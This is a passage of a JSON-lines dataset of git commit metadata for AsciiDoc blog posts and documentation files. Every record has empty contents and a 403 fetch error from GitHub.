2016-03-18-Introduction-a-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fa145f545a2e957478a86381305ae73496aaa6","subject":"Update 2017-07-01-Winter-vacation-part-1.adoc","message":"Update 2017-07-01-Winter-vacation-part-1.adoc","repos":"endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog","old_file":"_posts\/2017-07-01-Winter-vacation-part-1.adoc","new_file":"_posts\/2017-07-01-Winter-vacation-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b06eb4a94f84c8d82c06231cc6b77d471bc3b6fa","subject":"Update 2015-02-27-First-post.adoc","message":"Update 2015-02-27-First-post.adoc","repos":"pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2015-02-27-First-post.adoc","new_file":"_posts\/2015-02-27-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97f1ec124a2747f258ff43780b0c56e2c5e9f87f","subject":"Update 2016-08-17-2016-08-15.adoc","message":"Update 2016-08-17-2016-08-15.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-17-2016-08-15.adoc","new_file":"_posts\/2016-08-17-2016-08-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"515075099f53c3adeae4c8b25e52dcacd241d1a4","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d48237c8d31220e0eb33a3b7b414aa7f59beca","subject":"Create 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","message":"Create 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc632a8907e237aed86bcc1ff6eccf1de2de238b","subject":"Add blog placeholder","message":"Add blog placeholder\n","repos":"scepta\/scepta.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-03-03-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-03-03-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scepta\/scepta.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34dea5ebcda32b4bb068db9a181323982815b4e6","subject":"Add a README.asciidoc","message":"Add a 
README.asciidoc\n","repos":"ekie\/kakoune,zakgreant\/kakoune,flavius\/kakoune,flavius\/kakoune,Asenar\/kakoune,danielma\/kakoune,zakgreant\/kakoune,occivink\/kakoune,Asenar\/kakoune,flavius\/kakoune,xificurC\/kakoune,elegios\/kakoune,occivink\/kakoune,mawww\/kakoune,danielma\/kakoune,elegios\/kakoune,rstacruz\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,rstacruz\/kakoune,mawww\/kakoune,Somasis\/kakoune,casimir\/kakoune,danr\/kakoune,Asenar\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,mawww\/kakoune,ekie\/kakoune,xificurC\/kakoune,alpha123\/kakoune,casimir\/kakoune,danr\/kakoune,zakgreant\/kakoune,ekie\/kakoune,elegios\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,lenormf\/kakoune,lenormf\/kakoune,alexherbo2\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,elegios\/kakoune,Asenar\/kakoune,casimir\/kakoune,ekie\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,lenormf\/kakoune,danielma\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,xificurC\/kakoune,danr\/kakoune,occivink\/kakoune,danr\/kakoune,jkonecny12\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,flavius\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"ece672a27a9d5da9f44c004487c33d7d47cc8c75","subject":"anotehr small update2","message":"anotehr small update2\n","repos":"dimagol\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe9bc385db5a3df5836ede6e7a0b485c956df69b","subject":"initial cut of GEP-3","message":"initial cut of GEP-3\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-3.adoc","new_file":"site\/src\/site\/wiki\/GEP-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7caafca102875ac40b7a811bc8f63af80dd61bed","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7eea7b848bf5652066009449a6268a616170e31","subject":"Update 2016-06-15-The-softer-side-of-programming-Part-1.adoc","message":"Update 2016-06-15-The-softer-side-of-programming-Part-1.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-06-15-The-softer-side-of-programming-Part-1.adoc","new_file":"_posts\/2016-06-15-The-softer-side-of-programming-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b611a33513963e7aa6cb6de678c6e64c103ab4","subject":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","message":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","new_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5df5da1e4be7359f7dca5d13aecef6161094f236","subject":"y2b create post You've Never Seen Headphones Like This...","message":"y2b create post You've Never Seen Headphones Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-28-Youve-Never-Seen-Headphones-Like-This.adoc","new_file":"_posts\/2017-01-28-Youve-Never-Seen-Headphones-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f46871bf00443b49cf1eb7fd7ec9400c1583b34a","subject":"Additions to NOTES.adoc","message":"Additions to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aff34265c3e430d542fc16f44c2986173050065","subject":"Add affinity filter into requirements","message":"Add affinity filter into requirements\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f7fe394caf2d30452aee775c3e06e8b0a07d752","subject":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05698e18e44d2aaa7d9b5723a7e5f2686ae9dfcf","subject":"Polish","message":"Polish\n","repos":"chrylis\/spring-boot,olivergierke\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,nebhale\/spring-boot,olivergierke\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,bijukunjummen\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,sebastiankirsch\/spring-boot,zhangshuangquan\/spring-root,bclozel\/spring-boot,sbcoba\/spring-boot,javyzheng\/spring-boot,bbrouwer\/spring-boot,rweisleder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,mrumpf\/spring-boot,felipeg48\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,i007422\/jenkins2-course-spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,habuma\/spring-boot,lenicliu\/spring-boot,jmnarloch\/spring-boot,SaravananParthasarathy\/SPSDemo,royclarkson\/spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,mdeinum\/spring-boot,ameraljovic\/spring-boot,joshiste\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,nebhale\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot-concourse,shangyi0102\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,NetoDevel\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,jxblum\/spring-boot,qerub\/spring-boot,shangyi0102\/spring-boot,minmay\/spring-boot,bbrouwer\/spring-boot,lexandro\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,lexandro\/spring-boot,thomasdari
mont\/spring-boot,sbcoba\/spring-boot,zhangshuangquan\/spring-root,rweisleder\/spring-boot,pvorb\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,rweisleder\/spring-boot,mosoft521\/spring-boot,Nowheresly\/spring-boot,dfa1\/spring-boot,herau\/spring-boot,kdvolder\/spring-boot,jbovet\/spring-boot,RichardCSantana\/spring-boot,neo4j-contrib\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,hqrt\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,vakninr\/spring-boot,bclozel\/spring-boot,Buzzardo\/spring-boot,candrews\/spring-boot,hqrt\/jenkins2-course-spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,joshiste\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,dreis2211\/spring-boot,pvorb\/spring-boot,mrumpf\/spring-boot,pvorb\/spring-boot,SaravananParthasarathy\/SPSDemo,jayarampradhan\/spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,ihoneymon\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,xiaoleiPENG\/my-project,joshthornhill\/spring-boot,brettwooldridge\/spring-boot,xiaoleiPENG\/my-project,yangdd1205\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,thomasdarimont\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,sbuettner\/spring-boot,mbenson\/spring-boot,bbrouwer\/spring-boot,neo4j-contrib\/spring-boot,drumonii\/spring-boot,dfa1\/spring-boot,shangyi0102\/spring-boot,jayarampradhan\/spring-boot,dreis2211\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,isopov\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,linead\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,vakninr\/spring-boot,yhj630520\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,vpavic\/spring-boot,kamilszymanski\/spring-boot,SaravananParthasarathy\/SPSDemo,qerub\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,RichardCSantana\/spring-boot,sebastiankirsch\/spring-boot,ilayaperumalg\/spring-boot,mrumpf\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,bjornlindstrom\/spring-boot,ameraljovic\/spring-boot,shangyi0102\/spring-boot,vpavic\/spring-boot,bjornlindstrom\/spring-boot,ihoneymon\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,yangdd1205\/spring-boot,brettwooldridge\/spring-boo
t,bijukunjummen\/spring-boot,lucassaldanha\/spring-boot,bjornlindstrom\/spring-boot,DeezCashews\/spring-boot,xiaoleiPENG\/my-project,herau\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,RichardCSantana\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,neo4j-contrib\/spring-boot,sbuettner\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,lburgazzoli\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,jvz\/spring-boot,zhangshuangquan\/spring-root,izeye\/spring-boot,kamilszymanski\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,deki\/spring-boot,candrews\/spring-boot,afroje-reshma\/spring-boot-sample,deki\/spring-boot,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,mrumpf\/spring-boot,joansmith\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,herau\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,lburgazzoli\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,dreis2211\/spring-boot,thomasdarimont\/spring-boot,ameraljovic\/spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,philwebb\/spring-boot,nebhale\/spring-boot,neo4j-contrib\/spring-boot,candrews\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,jvz\/spring-boot,jxblum\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,kdvolder\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,Nowheresly\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,sbuettner\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,jmnarloch\/spring-boot,zhanhb\/spring-boot,sbcoba\/spring-boot,ameraljovic\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,sbuettner\/spring-boot,bclozel\/spring-boot,joansmith\/spring-boot,bbrouwer\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,jvz\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,candrews\/spring-boot,akmaharshi\/jenkins,mdeinum\/spring-boot,jbovet\/spring-boot,chrylis\/spring-boot,mbogoevici\/spring-boot,joshiste\/spring-boot,vakninr\/spring-boot,ihoneymon\/spring-boot,jxblum\/spring-boot,DeezCashews\/spring-boot,vakninr\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,bijukunjummen\/spring-boot,i007422\/jenkins2-course-spring-boot,kdvolder\/spring-boot,dfa1\/spring-boot,javyzheng\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,dfa1\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,htynkn\/spring-boot,vakninr\/spring-boot,sbuettner\/spring-boot,habuma\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,cleverjava\/jenkins2-cours
e-spring-boot,herau\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,mrumpf\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,jmnarloch\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,michael-simons\/spring-boot,xiaoleiPENG\/my-project,ihoneymon\/spring-boot,kamilszymanski\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,jbovet\/spring-boot,jmnarloch\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,NetoDevel\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,akmaharshi\/jenkins,vpavic\/spring-boot,felipeg48\/spring-boot,linead\/spring-boot,mbogoevici\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,lenicliu\/spring-boot,hqrt\/jenkins2-course-spring-boot,joansmith\/spring-boot,habuma\/spring-boot,yhj630520\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,mosoft521\/spring-boot,donhuvy\/spring-boot,royclarkson\/spring-boot,yangdd1205\/spring-boot,DeezCashews\/spring-boot,lenicliu\/spring-boot,tsachev\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7326db42adc1163abaa513b03114f9d279b79d9c","subject":"#71 extended docs regarding node mapping","message":"#71 extended docs regarding node mapping\n","repos":"SMB-TEC\/extended-objects,buschmais\/extended-objects","old_file":"neo4j\/src\/main\/asciidoc\/index.asciidoc","new_file":"neo4j\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SMB-TEC\/extended-objects.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b0202b7990ad86c90728ff3aa6a056a28221689","subject":"y2b create post Riding The New Segway miniPRO","message":"y2b create post Riding The New Segway miniPRO","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-30-Riding-The-New-Segway-miniPRO.adoc","new_file":"_posts\/2016-06-30-Riding-The-New-Segway-miniPRO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc6744f2b32e035e98359e76d3115d55e523138","subject":"y2b create post iPhone 8 Hands On With Mock-Up","message":"y2b create post iPhone 8 Hands On With 
Mock-Up","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-02-iPhone-8-Hands-On-With-MockUp.adoc","new_file":"_posts\/2017-05-02-iPhone-8-Hands-On-With-MockUp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08dfb78468fbd456d88329df5790147322fb37ee","subject":"Add differentiation between stopping and removing","message":"Add differentiation between stopping and removing\n\nSigned-off-by: Philipp Gille <591bfffdf6e3334e6a98ea9827b7ee5a394e4915@gmail.com>\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a6be2dc0f6c111e06fda842d2d1780801a3238","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5106000cdab141c6df16497289760942eb5fd3e6","subject":"add me as contributor","message":"add me as contributor\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/05_contributors.adoc","new_file":"src\/docs\/manual\/05_contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 